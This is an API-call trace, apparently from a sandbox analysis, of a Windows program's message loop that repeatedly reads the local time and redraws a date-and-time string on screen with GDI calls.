GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x2c4)) [0116.967] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.392] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.392] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.392] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x85)) [0117.392] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x85)) [0117.392] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0117.392] GetDC (hWnd=0x0) returned 0xa0100d0 [0117.392] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0117.393] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0117.393] GetSysColor (nIndex=8) returned 0x0 [0117.393] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0117.393] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0117.393] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0117.393] UnrealizeObject (h=0x2d10099f) returned 1 [0117.393] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0117.393] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0117.393] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0117.393] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:47 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:47 PM", lprc=0x19f5bd) returned 13 [0117.393] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0117.393] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0117.393] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0117.393] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0117.393] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0117.393] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.402] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.402] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.402] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x8f)) [0117.402] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x8f)) [0117.402] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.423] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.423] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.423] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xa4)) [0117.423] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xa4)) [0117.423] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.434] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.434] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.434] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xaf)) [0117.434] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xaf)) [0117.434] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.455] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.455] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.455] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xc4)) [0117.455] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xc4)) [0117.455] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.466] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.466] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.466] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xcf)) [0117.466] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0xcf)) [0117.466] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.730] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.730] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.730] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x1d8)) [0117.731] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x1d8)) [0117.731] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.738] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.738] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.738] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x1df)) [0117.738] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x1df)) [0117.738] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.926] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.926] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.926] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x29c)) [0117.927] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x29c)) [0117.927] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0117.937] TranslateMessage (lpMsg=0x2347a14) returned 0 [0117.937] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0117.937] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x2a6)) [0117.937] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x2a6)) [0117.937] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.020] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.020] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.020] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x2f9)) [0118.020] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x2f9)) [0118.020] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.030] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.030] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.030] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x303)) [0118.030] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x303)) [0118.030] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.045] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.045] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.045] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x312)) [0118.045] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x312)) [0118.045] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.295] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.295] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.295] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x24)) [0118.295] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x24)) [0118.295] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0118.295] GetDC (hWnd=0x0) returned 0xa0100d0 [0118.295] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0118.296] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0118.296] GetSysColor (nIndex=8) returned 0x0 [0118.296] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0118.296] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0118.296] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0118.296] UnrealizeObject (h=0x2d10099f) returned 1 [0118.296] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0118.296] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0118.296] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0118.296] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:48 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:48 PM", lprc=0x19f5bd) returned 13 [0118.296] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0118.296] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0118.296] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0118.296] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0118.296] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0118.297] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.316] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.316] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.316] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x39)) [0118.316] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x39)) [0118.316] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.327] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.327] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.327] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x44)) [0118.327] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x44)) [0118.327] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.499] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.499] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.499] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0xf0)) [0118.499] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0xf1)) [0118.499] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.510] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.510] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.510] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0xfb)) [0118.510] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0xfb)) [0118.510] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.530] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.530] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.530] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x10f)) [0118.530] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x10f)) [0118.530] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.552] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.552] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.552] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x125)) [0118.552] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x125)) [0118.552] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.562] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.562] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.562] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x12f)) [0118.562] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x12f)) [0118.562] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.583] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.583] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.583] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x144)) [0118.583] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x144)) [0118.583] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.593] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.593] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.593] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x14e)) [0118.593] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x14e)) [0118.593] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.604] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.604] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.604] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x159)) [0118.604] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x159)) [0118.604] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.624] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.624] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.624] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x16d)) [0118.624] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x16d)) [0118.624] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.645] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.645] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.645] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x182)) [0118.645] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x182)) [0118.645] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.655] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.655] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.655] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x18c)) [0118.655] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x18c)) [0118.655] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.677] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.677] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.677] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1a2)) [0118.677] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1a2)) [0118.677] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.688] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.688] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.688] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1ad)) [0118.688] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1ad)) [0118.688] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.698] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.698] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.698] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1b8)) [0118.699] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1b8)) [0118.699] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.719] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.719] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.719] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1cc)) [0118.719] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1cc)) [0118.719] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.730] TranslateMessage (lpMsg=0x2347a14) returned 0 [0118.730] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0118.730] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1d7)) [0118.730] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x30, wMilliseconds=0x1d8)) [0118.730] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0118.752] TranslateMessage (lpMsg=0x2347a14) returned 0 